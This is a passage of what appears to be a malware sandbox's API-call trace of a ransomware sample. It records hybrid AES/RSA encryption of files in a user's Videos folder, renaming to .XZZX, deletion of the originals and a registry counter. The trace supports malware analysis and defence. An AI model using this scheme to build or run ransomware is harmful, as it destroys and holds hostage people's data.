nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0129.428] SetFilePointer (in: hFile=0x670, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8f44 [0129.428] SetErrorMode (uMode=0x1) returned 0x1 [0129.428] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0129.428] OutputDebugStringW (lpOutputString="end") [0129.428] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v0\x88Ê\x03`Õ4\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0129.428] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x434dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8 | out: pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8) returned 1 [0129.428] CryptAcquireContextW (in: phProv=0x434d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x434d3e4*=0x3d1f668) returned 1 [0129.429] CryptImportPublicKeyInfo (in: hCryptProv=0x3d1f668, dwCertEncodingType=0x1, pInfo=0x3d0e728*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3d0e758*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3d0e760*, PublicKey.cUnusedBits=0x0), phKey=0x434d3ec | out: phKey=0x434d3ec*=0x3cde3d8) returned 1 [0129.429] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0129.430] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0129.430] CryptEncrypt (in: hKey=0x3cde3d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x434d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x434d3f0*=0x80) returned 1 [0129.430] CryptEncrypt (in: hKey=0x3cde3d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3d1f6f0*, pdwDataLen=0x434d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3d1f6f0*, pdwDataLen=0x434d3e8*=0x80) returned 1 [0129.430] WriteFile (in: hFile=0x670, lpBuffer=0x3d1f6f0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3d1f6f0*, lpNumberOfBytesWritten=0x434e438*=0x80, lpOverlapped=0x0) returned 1 [0129.430] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0129.430] WriteFile (in: hFile=0x670, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0129.430] GetUserNameW (in: lpBuffer=0x434e1f8, pcbBuffer=0x434dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x434dfe0) returned 1 [0129.470] wsprintfW (in: param_1=0x434dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0129.470] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe4 | out: phkResult=0x434dfe4*=0x678) returned 0x0 [0129.470] RegQueryValueExW (in: hKey=0x678, lpValueName="E1010314", lpReserved=0x0, lpType=0x434dfd8, lpData=0x434dfec, lpcbData=0x434dfdc*=0x4 | out: lpType=0x434dfd8*=0x4, lpData=0x434dfec*=0xaa, lpcbData=0x434dfdc*=0x4) returned 0x0 [0129.470] RegCloseKey (hKey=0x678) returned 0x0 [0129.470] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe8 | out: phkResult=0x434dfe8*=0x678) returned 0x0 [0129.470] RegSetValueExW (in: hKey=0x678, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x434dfec*=0xab, cbData=0x4 | out: lpData=0x434dfec*=0xab) returned 0x0 [0129.470] RegCloseKey (hKey=0x678) returned 0x0 [0129.470] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.471] VirtualFree (lpAddress=0x40a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.471] CloseHandle (hObject=0x670) returned 1 [0129.472] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0129.473] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0129.473] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\s2dwcVO_4E6w.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\s2dwcvo_4e6w.flv")) returned 1 [0129.473] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\s2dwcVO_4E6w.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\s2dwcvo_4e6w.flv")) returned 0 Thread: id = 435 os_tid = 0x9e0 [0129.345] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0129.345] lstrcpyW (in: lpString1=0x420f460, lpString2="zpPjma0L3Hj-_nB.mp4" | out: lpString1="zpPjma0L3Hj-_nB.mp4") returned="zpPjma0L3Hj-_nB.mp4" [0129.345] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0129.345] SetErrorMode (uMode=0x1) returned 0x1 [0129.345] lstrcpyW (in: lpString1=0x420f860, lpString2="zpPjma0L3Hj-_nB.mp4" | out: lpString1="zpPjma0L3Hj-_nB.mp4") returned="zpPjma0L3Hj-_nB.mp4" [0129.345] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x582a8c7f, Data2=0xf65b, Data3=0x4a9b, Data4=([0]=0xa4, [1]=0x26, [2]=0x5d, [3]=0xf8, [4]=0x56, [5]=0x45, [6]=0x6a, [7]=0xfc))) returned 0x0 [0129.345] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\zpPjma0L3Hj-_nB.mp4") returned 60 [0129.345] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0129.345] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\3A21FB2547CB7719582A8C7F4BEC5B61.XZZX") returned 78 [0129.345] StrStrW (lpFirst="zpPjma0L3Hj-_nB.mp4", lpSrch="XZZX") returned 0x0 [0129.345] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\zpPjma0L3Hj-_nB.mp4", dwFileAttributes=0x20) returned 1 [0129.346] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\zpPjma0L3Hj-_nB.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\zppjma0l3hj-_nb.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x670 [0129.346] ReadFile (in: hFile=0x670, lpBuffer=0x4362048, nNumberOfBytesToRead=0x6f4c, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x4362048*, lpNumberOfBytesRead=0x420e418*=0x6f4c, lpOverlapped=0x0) returned 1 [0129.347] CloseHandle (hObject=0x670) returned 1 [0129.347] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x40f0000 [0129.348] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4350000 [0129.348] SetErrorMode (uMode=0x1) returned 0x1 [0129.348] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0129.348] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3d1f5e0) returned 1 [0129.351] CryptGenKey (in: hProv=0x3d1f5e0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cde558) returned 1 [0129.499] CryptExportKey (in: hKey=0x3cde558, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0129.499] CryptExportKey (in: hKey=0x3cde558, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4350000, pdwDataLen=0x420e41c | out: pbData=0x4350000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0129.499] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0129.499] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0129.499] CryptDestroyKey (hKey=0x3cde558) returned 1 [0129.499] CryptReleaseContext (hProv=0x3d1f5e0, dwFlags=0x0) returned 0 [0129.500] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\3A21FB2547CB7719582A8C7F4BEC5B61.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\3a21fb2547cb7719582a8c7f4bec5b61.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x668 [0129.500] WriteFile (in: hFile=0x668, lpBuffer=0x4362048*, nNumberOfBytesToWrite=0x6f4c, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x4362048*, lpNumberOfBytesWritten=0x420e438*=0x6f4c, lpOverlapped=0x0) returned 1 [0129.501] SetFilePointer (in: hFile=0x668, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6f4c [0129.501] WriteFile (in: hFile=0x668, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0129.501] SetFilePointer (in: hFile=0x668, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6f51 [0129.501] WriteFile (in: hFile=0x668, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x26, lpOverlapped=0x0) returned 1 [0129.501] SetFilePointer (in: hFile=0x668, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6f77 [0129.501] WriteFile (in: hFile=0x668, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0129.501] SetFilePointer (in: hFile=0x668, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6f7c [0129.501] SetErrorMode (uMode=0x1) returned 0x1 [0129.502] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0129.502] OutputDebugStringW (lpOutputString="end") [0129.502] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v0\x88Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0129.502] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0129.502] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3d1f778) returned 1 [0129.502] CryptImportPublicKeyInfo (in: hCryptProv=0x3d1f778, dwCertEncodingType=0x1, pInfo=0x3d0de38*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3d0de68*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3d0de70*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3cde558) returned 1 [0129.502] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0129.503] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0129.503] CryptEncrypt (in: hKey=0x3cde558, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0129.503] CryptEncrypt (in: hKey=0x3cde558, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3d1f800*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3d1f800*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0129.503] WriteFile (in: hFile=0x668, lpBuffer=0x3d1f800*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3d1f800*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0129.503] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0129.503] WriteFile (in: hFile=0x668, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0129.504] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0129.504] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0129.504] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x670) returned 0x0 [0129.504] RegQueryValueExW (in: hKey=0x670, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0xab, lpcbData=0x420dfdc*=0x4) returned 0x0 [0129.504] RegCloseKey (hKey=0x670) returned 0x0 [0129.504] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x670) returned 0x0 [0129.504] RegSetValueExW (in: hKey=0x670, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0xac, cbData=0x4 | out: lpData=0x420dfec*=0xac) returned 0x0 [0129.504] RegCloseKey (hKey=0x670) returned 0x0 [0129.504] VirtualFree (lpAddress=0x40f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.505] VirtualFree (lpAddress=0x4350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.505] CloseHandle (hObject=0x668) returned 1 [0129.506] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0129.506] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0129.506] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\zpPjma0L3Hj-_nB.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\zppjma0l3hj-_nb.mp4")) returned 1 [0129.507] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\zpPjma0L3Hj-_nB.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\zppjma0l3hj-_nb.mp4")) returned 0 Thread: id = 436 os_tid = 0x9e4 [0129.511] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0129.511] lstrcpyW (in: lpString1=0x420f460, lpString2="2 mjBTvZEWz.swf" | out: lpString1="2 mjBTvZEWz.swf") returned="2 mjBTvZEWz.swf" [0129.511] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" [0129.511] SetErrorMode (uMode=0x1) returned 0x1 [0129.511] lstrcpyW (in: lpString1=0x420f860, lpString2="2 mjBTvZEWz.swf" | out: lpString1="2 mjBTvZEWz.swf") returned="2 mjBTvZEWz.swf" [0129.511] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x1071035c, Data2=0x885d, Data3=0x4f9b, Data4=([0]=0x8a, [1]=0xd5, [2]=0xde, [3]=0x43, [4]=0x99, [5]=0x2e, [6]=0x5d, [7]=0x91))) returned 0x0 [0129.511] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2 mjBTvZEWz.swf") returned 74 [0129.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0129.511] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\02D7186C2A67434F1071035C2E882797.XZZX") returned 96 [0129.511] StrStrW (lpFirst="2 mjBTvZEWz.swf", lpSrch="XZZX") returned 0x0 [0129.511] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2 mjBTvZEWz.swf", dwFileAttributes=0x20) returned 1 [0129.512] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2 mjBTvZEWz.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\2 mjbtvzewz.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x668 [0129.512] ReadFile (in: hFile=0x668, lpBuffer=0x3d0feb8, nNumberOfBytesToRead=0x242b, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x3d0feb8*, lpNumberOfBytesRead=0x420e418*=0x242b, lpOverlapped=0x0) returned 1 [0129.513] CloseHandle (hObject=0x668) returned 1 [0129.513] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0129.514] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0129.514] SetErrorMode (uMode=0x1) returned 0x1 [0129.514] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0129.514] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3d1f888) returned 1 [0129.521] CryptGenKey (in: hProv=0x3d1f888, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cde658) returned 1 [0129.691] CryptExportKey (in: hKey=0x3cde658, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0129.691] CryptExportKey (in: hKey=0x3cde658, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40e0000, pdwDataLen=0x420e41c | out: pbData=0x40e0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0129.691] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0129.692] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0129.692] CryptDestroyKey (hKey=0x3cde658) returned 1 [0129.692] CryptReleaseContext (hProv=0x3d1f888, dwFlags=0x0) returned 1 [0129.692] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\02D7186C2A67434F1071035C2E882797.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\02d7186c2a67434f1071035c2e882797.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x67c [0129.692] WriteFile (in: hFile=0x67c, lpBuffer=0x3d0feb8*, nNumberOfBytesToWrite=0x242b, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3d0feb8*, lpNumberOfBytesWritten=0x420e438*=0x242b, lpOverlapped=0x0) returned 1 [0129.693] SetFilePointer (in: hFile=0x67c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x242b [0129.693] WriteFile (in: hFile=0x67c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0129.693] SetFilePointer (in: hFile=0x67c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2430 [0129.693] WriteFile (in: hFile=0x67c, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x1e, 